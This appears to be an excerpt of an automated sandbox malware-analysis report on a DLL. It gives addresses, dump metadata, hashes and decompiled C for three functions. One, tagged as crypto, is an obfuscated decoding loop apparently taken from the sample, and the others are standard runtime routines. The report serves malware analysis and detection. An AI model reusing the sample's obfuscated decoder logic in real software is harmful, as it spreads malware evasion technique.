            0x6d504a74
            0x6d504a78
            0x6d504a7e
            0x6d504a82
            0x6d504a8b
            0x6d504a91
            0x6d504b6e
            0x6d504b79
            0x6d504b89
            0x6d504b89
            0x6d504b8b
            0x6d504b8b
            0x6d504b92
            0x6d504b9c
            0x6d504ba2
            0x6d504ba2
            0x6d504bad
            0x6d504bad
            0x6d504bb3
            0x6d504bb3
            0x6d504bb9
            0x6d504bb9
            0x6d504bc1
            0x6d504bc4
            0x6d504bcd
            0x6d504bd4
            0x6d504bd5
            0x6d504bdd
            0x6d504be9
            0x6d504bea
            0x6d504bf0
            0x6d504bf3
            0x6d504bf4
            0x6d504c02
            0x6d504c0b
            0x6d504c0c
            0x6d504c19
            0x6d504c25
            0x6d504c33
            0x6d504c34
            0x6d504c3b
            0x6d504c49
            0x6d504c4a
            0x6d504c50
            0x6d504c53
            0x6d504c5c
            0x6d504c5d
            0x6d504c68
            0x6d504c69
            0x6d504c6a
            0x6d504c6f
            0x6d504c7a
            0x6d504c7a
            0x6d504c85
            0x6d504c88
            0x6d504c8e
            0x6d504c96
            0x6d504c97
            0x6d504ca3
            0x6d504ca9
            0x6d504cb6
            0x6d504cbc
            0x6d504cc3
            0x6d504cc4
            0x6d504cc5
            0x6d504cd5
            0x6d504cdf
            0x6d504ce2
            0x6d504ce3
            0x6d504cf0
            0x6d504cf1
            0x6d504cf2
            0x6d504cf7
            0x6d504cf7
            0x6d504a97
            0x6d504a97
            0x6d504a9b
            0x6d504aa5
            0x6d504aa5
            0x6d504ab0
            0x6d504ab7
            0x6d504ab7
            0x6d504abd
            0x6d504ac3
            0x6d504ac9
            0x6d504acf
            0x6d504ad2
            0x6d504ad2
            0x6d504adb
            0x6d504ae4
            0x6d504ae9
            0x6d504af2
            0x6d504af6
            0x6d504afd
            0x6d504b04
            0x6d504b08
            0x6d504b0d
            0x6d504b18
            0x6d504b1f
            0x6d504b20
            0x6d504b27
            0x6d504b2e
            0x6d504b2f
            0x6d504b36
            0x6d504b40
            0x6d504b41
            0x6d504b4b
            0x6d504b4c
            0x6d504b4d
            0x6d504b4e
            0x6d504b55
            0x6d504b5f
            0x6d504b5f
            0x6d504d08

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e2e343c06b778256d4fa8a41ddfdbf0324c60263a2836af7718262e99c3cfe4c
            • Instruction ID: e2fc452fc6bf2717530ef5b3c975506b7ff1d455b62df29c1364adc5763cd327
            • Opcode Fuzzy Hash: e2e343c06b778256d4fa8a41ddfdbf0324c60263a2836af7718262e99c3cfe4c
            • Instruction Fuzzy Hash: 8C91F372218601AFD754CF68C9C5E9BB7F8FB88304F08496AF999CB256D734E9018B61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D519545 Relevance: .2, Instructions: 202COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 100%
            			E6D519545() {
				void* _t145;
				void* _t171;
				signed int _t183;
				unsigned char _t184;
				intOrPtr _t185;
				signed int _t193;
				intOrPtr _t197;
				signed int _t199;
				void* _t201;
				signed int _t204;
				void* _t208;
				signed char _t213;
				signed int _t215;
				signed int _t217;
				intOrPtr _t218;
				intOrPtr _t219;
				signed int _t220;
				intOrPtr _t221;
				intOrPtr _t222;
				intOrPtr _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				void* _t227;
				void* _t230;

				_t223 =  *((intOrPtr*)(_t230 + 0x2c));
				_t224 = 0;
				 *(_t230 + 0x10) = 0;
				_t218 =  *((intOrPtr*)(_t223 + 0x8c));
				_t185 = _t218;
				_t183 =  *(_t223 + 0x4c) ^ 0x0000260d;
				 *((intOrPtr*)(_t230 + 0x1c)) = _t218;
				 *((intOrPtr*)(_t230 + 0x14)) = _t185;
				 *(_t223 + 0x38) =  *( *((intOrPtr*)(_t223 + 0x74)) + 0x90) ^  *(_t223 + 0x38) ^ 0x000029d1;
				 *(_t230 + 0x20) = _t183;
				if(_t183 <  *((intOrPtr*)(_t230 + 0x44))) {
					do {
						 *(_t223 + 0xd0) =  *(_t223 + 0xd0) | 0xfffffee8;
						 *( *((intOrPtr*)(_t223 + 0x14)) + _t183 + _t218) =  *((intOrPtr*)(_t183 +  *((intOrPtr*)(_t230 + 0x54)))) -  *((intOrPtr*)(_t230 + 0x50)) ^  *(_t230 + 0x4c);
						if( *((intOrPtr*)(_t230 + 0x48)) != 8) {
							 *(_t230 + 0x30) =  *( *((intOrPtr*)(_t223 + 0x14)) + _t183 + _t218) & 0x00000001;
							_t197 =  *((intOrPtr*)(_t230 + 0x48));
							 *((intOrPtr*)(_t230 + 0x18)) = _t197;
							if(_t197 != 0) {
								_t221 =  *((intOrPtr*)(_t230 + 0x14));
								_t184 =  *(_t230 + 0x30);
								 *(_t230 + 0x24) =  *(_t230 + 0x34) *  *(_t230 + 0x40);
								do {
									_t199 =  *(_t223 + 0x90);
									_t213 = _t184 >> _t197 - 0x00000001 & ( *(_t223 + 0x1c) & 0x000000ff) * 0x000000c5;
									 *(_t223 + 0xf8) = _t199 |  *(_t230 + 0x34);
									 *((intOrPtr*)(_t223 + 0xe4)) =  *((intOrPtr*)(_t223 + 0xe4)) -  *(_t230 + 0x24);
									_t226 = _t224 + 1;
									 *(_t230 + 0x10) = _t226;
									if(_t224 == 0) {
										_t145 = 0xffffffb8;
										 *((intOrPtr*)(_t223 + 0xe8)) =  *((intOrPtr*)(_t223 + 0xe8)) + _t145 - _t223;
										 *(_t223 + 0x90) =  *(_t223 + 0x24) * 0x29b2 + _t199;
										 *((intOrPtr*)(_t223 + 0x100)) =  *(_t223 + 0x1c) +  *((intOrPtr*)(_t230 + 0x2c));
										 *(_t221 +  *((intOrPtr*)(_t223 + 0x14))) = _t213;
										_t201 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x88)) + 0x1c)) - 0x76;
										if(_t201 != 0x2597) {
											_t217 =  *(_t223 + 0x1d4) -  *(_t230 + 0x40);
											_t171 = 0x2597 - _t201;
											do {
												_t171 = _t171 - 1;
											} while (_t171 != 0);
											 *(_t223 + 0x130) = _t217;
										}
										 *(_t223 + 0x24) =  *(_t223 + 0x1d4) | 0x00002ea5;
									} else {
										 *(_t223 + 0x24) =  *(_t223 + 0x24) - ( *(_t223 + 0x24) ^ 0x00002b78);
										 *(_t223 + 0x24) =  *( *((intOrPtr*)(_t223 + 0x50)) + 0x90) ^  *(_t223 + 0x24) ^ 0x00002749;
										 *( *((intOrPtr*)(_t223 + 0x14)) + _t221) =  *( *((intOrPtr*)(_t223 + 0x14)) + _t221) +  *( *((intOrPtr*)(_t223 + 0x14)) + _t221) | _t213;
										 *( *((intOrPtr*)(_t223 + 0x50)) + 0xe4) =  *( *((intOrPtr*)(_t223 + 0x50)) + 0xe4) | 0x00003356;
									}
									 *(_t223 + 0x168) =  *(_t223 + 0x168) |  *( *((intOrPtr*)(_t223 + 0x10)) + 0x130) | 0x00002ab3;
									 *(_t223 + 0x17c) =  *(_t223 + 0x17c) ^ ( *( *((intOrPtr*)(_t223 + 0x88)) + 0x90) | 0x000029b2);
									if(_t226 ==  *( *((intOrPtr*)(_t223 + 8)) + 0x80) * 0x46204968) {
										_t227 = 0x2b78;
										if( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x74)) + 0x1c)) + 0x56d > 0x2b78) {
											_t204 =  *(_t223 + 0x130);
											_t215 =  *(_t223 + 0x48);
											_t222 =  *((intOrPtr*)(_t223 + 0x74));
											do {
												_t215 = _t215 ^ _t204;
												_t204 = _t204 - 1;
												 *(_t223 + 0x48) = _t215;
												_t227 = _t227 + 1;
												 *(_t223 + 0x130) = _t204;
											} while (_t227 <  *((intOrPtr*)(_t222 + 0x1c)) + 0x56d);
											_t221 =  *((intOrPtr*)(_t230 + 0x14));
										}
										_t221 = _t221 + 1;
										 *(_t230 + 0x10) =  *(_t223 + 0x1c) ^ 0x0000260d;
										 *((intOrPtr*)(_t230 + 0x14)) = _t221;
									}
									_t197 =  *((intOrPtr*)(_t230 + 0x18)) - 1;
									_t224 =  *(_t230 + 0x10);
									 *(_t223 + 0xd0) =  *(_t223 + 0xd0) ^  *(_t223 + 0x3c) + ( *(_t230 + 0x38) & 0x0000ffff);
									 *((intOrPtr*)(_t230 + 0x18)) = _t197;
								} while (_t197 != 0);
								_t218 =  *((intOrPtr*)(_t230 + 0x1c));
								_t183 =  *(_t230 + 0x20);
							}
						}
						_t225 =  *(_t223 + 0x1d4);
						_t208 = 0x260d;
						if(( *(_t225 + 0x4c) ^ 0x00000002) != 0x260d) {
							_t220 =  *(_t223 + 0x13c) * 0x260d;
							_t193 =  *(_t223 + 0x3c);
							do {
								_t193 = _t193 | _t220;
								_t208 = _t208 + 1;
								 *(_t223 + 0x3c) = _t193;
							} while (_t208 != ( *(_t225 + 0x4c) ^ 0x00000002));
							_t218 =  *((intOrPtr*)(_t230 + 0x1c));
						}
						_t224 =  *(_t230 + 0x10);
						_t183 = _t183 + 1;
						 *(_t230 + 0x20) = _t183;
					} while (_t183 <  *((intOrPtr*)(_t230 + 0x44)));
					_t185 =  *((intOrPtr*)(_t230 + 0x14));
				}
				if( *((intOrPtr*)(_t230 + 0x48)) != 8) {
					_t219 = _t185;
					 *(_t223 + 0x110) =  *(_t223 + 0x110) |  *(_t223 + 0x2c) ^ 0x00002c90;
					 *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x124)) + 0x24)) =  *((intOrPtr*)(_t223 + 0xe4)) -  *((intOrPtr*)(_t230 + 0x2c));
					 *((intOrPtr*)(_t223 + 0xc4)) = 0x29b2;
				} else {
					_t219 = _t218 +  *((intOrPtr*)(_t230 + 0x44));
				}
				return _t219;
			}




























            0x6d51954b
            0x6d51954f
            0x6d519552
            0x6d519559
            0x6d51955f
            0x6d519564
            0x6d51956a
            0x6d51957c
            0x6d519580
            0x6d519583
            0x6d51958b
            0x6d519591
            0x6d519595
            0x6d5195b4
            0x6d5195b7
            0x6d5195d1
            0x6d5195d5
            0x6d5195d9
            0x6d5195df
            0x6d5195ee
            0x6d5195f2
            0x6d5195f6
            0x6d5195fa
            0x6d51960a
            0x6d519610
            0x6d519618
            0x6d519622
            0x6d51962a
            0x6d51962b
            0x6d519631
            0x6d519670
            0x6d519673
            0x6d519682
            0x6d51968f
            0x6d519698
            0x6d5196a9
            0x6d5196ae
            0x6d5196b6
            0x6d5196ba
            0x6d5196bc
            0x6d5196bc
            0x6d5196bc
            0x6d5196c1
            0x6d5196c1
            0x6d5196d2
            0x6d519633
            0x6d51963b
            0x6d51964f
            0x6d51965c
            0x6d519662
            0x6d519662
            0x6d5196e3
            0x6d5196fa
            0x6d51970f
            0x6d519719
            0x6d519725
            0x6d519727
            0x6d51972d
            0x6d519730
            0x6d519733
            0x6d519733
            0x6d519735
            0x6d519736
            0x6d519739
            0x6d51973a
            0x6d519748
            0x6d51974c
            0x6d51974c
            0x6d519759
            0x6d51975a
            0x6d51975e
            0x6d51975e
            0x6d519769
            0x6d51976f
            0x6d519775
            0x6d51977b
            0x6d51977f
            0x6d519787
            0x6d51978b
            0x6d51978b
            0x6d5195df
            0x6d51978f
            0x6d51979a
            0x6d5197a4
            0x6d5197a6
            0x6d5197b0
            0x6d5197b3
            0x6d5197b3
            0x6d5197b5
            0x6d5197b6
            0x6d5197bf
            0x6d5197c3
            0x6d5197c3
            0x6d5197c7
            0x6d5197cb
            0x6d5197cc
            0x6d5197d0
            0x6d5197da
            0x6d5197da
            0x6d5197e3
            0x6d5197f1
            0x6d5197fc
            0x6d51980c
            0x6d51980f
            0x6d5197e5
            0x6d5197e5
            0x6d5197e5
            0x6d519822

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 757f7a324926c80984bd9b3dc6681fd882949ffe4824597ca1a24a6f21f33aa9
            • Instruction ID: e29ed3be8f6fb02d3e7596c7240c8091096109f32582eef2ed6e49c3be3813ae
            • Opcode Fuzzy Hash: 757f7a324926c80984bd9b3dc6681fd882949ffe4824597ca1a24a6f21f33aa9
            • Instruction Fuzzy Hash: F391F075608B418FD328CF29C590A9ABBF1FF89304F514A2EE5AA87B51D730F805CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D511F09 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
            Download Yara Rule
            C-Code - Quality: 73%
            			E6D511F09(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x6d55ce08; // 0xc2f81198
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6d55dda0 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x6d55dda0 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E6D50ED85(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E6D50E99B( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6D50E99B();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								_t45 =  &_v36; // 0x6d51267e
								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											_t55 =  &_v36; // 0x6d51267e
											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6D508B95(_v8 ^ _t136);
			}


































            0x6d511f11
            0x6d511f18
            0x6d511f1b
            0x6d511f23
            0x6d511f27
            0x6d511f33
            0x6d511f36
            0x6d511f39
            0x6d511f40
            0x6d511f48
            0x6d511f4b
            0x6d511f51
            0x6d511f57
            0x6d511f5c
            0x6d511f5e
            0x6d511f61
            0x6d511f66
            0x6d511f70
            0x6d511f77
            0x6d511f7a
            0x6d511f81
            0x6d511f88
            0x6d511fb4
            0x6d511fda
            0x6d511fdc
            0x00000000
            0x6d511fb6
            0x6d511fb9
            0x6d512080
            0x6d51208c
            0x6d512097
            0x6d51209c
            0x6d511fbf
            0x6d511fc6
            0x6d511fcb
            0x6d511fd1
            0x6d511fd7
            0x00000000
            0x6d511fd7
            0x6d511fd1
            0x6d511fb9
            0x6d511f8a
            0x6d511f8e
            0x6d511f91
            0x6d511f97
            0x6d511f99
            0x6d511f9c
            0x6d511fa0
            0x6d511fdd
            0x6d511fe0
            0x6d511fe1
            0x6d511fe6
            0x6d511fec
            0x6d511ff2
            0x6d512001
            0x6d512007
            0x6d51200d
            0x6d512012
            0x6d51201a
            0x6d51202e
            0x6d5120a1
            0x6d5120a7
            0x6d512030
            0x6d512038
            0x6d512041
            0x6d512047
            0x00000000
            0x6d512049
            0x6d51204b
            0x6d51204e
            0x6d512052
            0x6d512067
            0x00000000
            0x6d512069
            0x6d51206d
            0x6d51206f
            0x6d512072
            0x00000000
            0x6d512072
            0x6d51206d
            0x6d512067
            0x6d512047
            0x6d512041
            0x6d51202e
            0x6d512012
            0x6d511fec
            0x00000000
            0x6d512075
            0x6d512075
            0x6d5120a9
            0x6d5120bb

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,6D51267E,?,00000000,?,00000000,00000000), ref: 6D511F4B
            • __fassign.LIBCMT ref: 6D511FC6
            • __fassign.LIBCMT ref: 6D511FE1
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 6D512007
            • WriteFile.KERNEL32(?,?,00000000,~&Qm,00000000,?,?,?,?,?,?,?,?,?,6D51267E,?), ref: 6D512026
            • WriteFile.KERNEL32(?,?,00000001,~&Qm,00000000,?,?,?,?,?,?,?,?,?,6D51267E,?), ref: 6D51205F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID: ~&Qm
            • API String ID: 1324828854-113722129
            • Opcode ID: d4845c0a456978ea7ea6089f9d682ae35a49d87698851b4c49001b95ca3c67e6
            • Instruction ID: d7b25c9e6f02fbe85c1eca361fb5f7fe47f5f04b362a4a26146407471368acc6
            • Opcode Fuzzy Hash: d4845c0a456978ea7ea6089f9d682ae35a49d87698851b4c49001b95ca3c67e6
            • Instruction Fuzzy Hash: AC51E275A0420A9FEF14CFA8CC85BEEBBF8EF4A300F15455AE951E7681E7309940CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D510500 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
            Download Yara Rule
            C-Code - Quality: 69%
            			E6D510500(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6d55ce08; // 0xc2f81198
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E6D511DB8(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E6D508B95(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E6D5104E0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E6D50CD05(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E6D5104E0(_t101);
									goto L36;
								}
								_t62 = E6D50CD05(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E6D5104E0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E6D50B438(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E6D513490();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E6D50CD05(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6D50B438(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6D513490();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























            0x6d510505
            0x6d510506
            0x6d510507
            0x6d51050e
            0x6d510512
            0x6d510513
            0x6d510519
            0x6d51051f
            0x6d510525
            0x6d510528
            0x6d510528
            0x6d51052b
            0x6d51052d
            0x6d51052d
            0x6d51052b
            0x6d51052f
            0x6d510534
            0x6d51053b
            0x6d51053e
            0x6d51053e
            0x6d51055a
            0x6d510560
            0x6d510565
            0x6d5106f8
            0x6d51070b
            0x6d51056b
            0x6d51056b
            0x6d51056e
            0x6d510573
            0x6d510577
            0x6d5105cb
            0x6d5105cb
            0x6d5105cd
            0x6d5105cf
            0x6d5106ed
            0x6d5106ed
            0x6d5106ef
            0x6d5106f0
            0x00000000
            0x6d5106f6
            0x6d5105e0
            0x6d5105e6
            0x6d5105e8
            0x00000000
            0x00000000
            0x6d5105ee
            0x6d510600
            0x6d510605
            0x6d510609
            0x00000000
            0x00000000
            0x6d510616
            0x6d510650
            0x6d510653
            0x6d510656
            0x6d510658
            0x6d51065a
            0x6d51065c
            0x6d5106a8
            0x6d5106a8
            0x6d5106aa
            0x6d5106aa
            0x6d5106ac
            0x6d5106e6
            0x6d5106e7
            0x00000000
            0x6d5106ec
            0x6d5106c0
            0x6d5106c5
            0x6d5106c7
            0x00000000
            0x00000000
            0x6d5106cb
            0x6d5106cc
            0x6d5106cd
            0x6d5106d0
            0x6d51070c
            0x6d51070f
            0x6d5106d2
            0x6d5106d2
            0x6d5106d3
            0x6d5106d3
            0x6d5106e0
            0x6d5106e2
            0x6d5106e4
            0x6d510715
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d5106e4
            0x6d51065e
            0x6d510661
            0x6d510663
            0x6d510665
            0x6d510667
            0x6d51066a
            0x6d51066f
            0x6d51068a
            0x6d51068c
            0x6d510696
            0x6d510698
            0x6d510699
            0x6d51069b
            0x00000000
            0x00000000
            0x6d51069d
            0x6d5106a3
            0x6d5106a3
            0x00000000
            0x6d5106a3
            0x6d510671
            0x6d510673
            0x6d510677
            0x6d51067c
            0x6d51067e
            0x6d510680
            0x00000000
            0x00000000
            0x6d510682
            0x00000000
            0x6d510682
            0x6d510618
            0x6d51061d
            0x00000000
            0x00000000
            0x6d510623
            0x6d510625
            0x00000000
            0x00000000
            0x6d51063c
            0x6d510641
            0x6d510645
            0x00000000
            0x00000000
            0x00000000
            0x6d51064b
            0x6d51057e
            0x6d510580
            0x6d510582
            0x6d51058a
            0x6d5105a9
            0x6d5105ab
            0x6d5105b5
            0x6d5105b7
            0x6d5105b8
            0x6d5105ba
            0x00000000
            0x00000000
            0x6d5105c0
            0x6d5105c6
            0x6d5105c6
            0x00000000
            0x6d5105c6
            0x6d51058e
            0x6d510592
            0x6d510597
            0x6d51059b
            0x00000000
            0x00000000
            0x6d5105a1
            0x00000000
            0x6d5105a1

            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,6D50DAF1,00000000,?,?,?,6D510751,?,?,00000100), ref: 6D51055A
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,6D510751,?,?,00000100,5EFC4D8B,?,?), ref: 6D5105E0
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D5106DA
            • __freea.LIBCMT ref: 6D5106E7
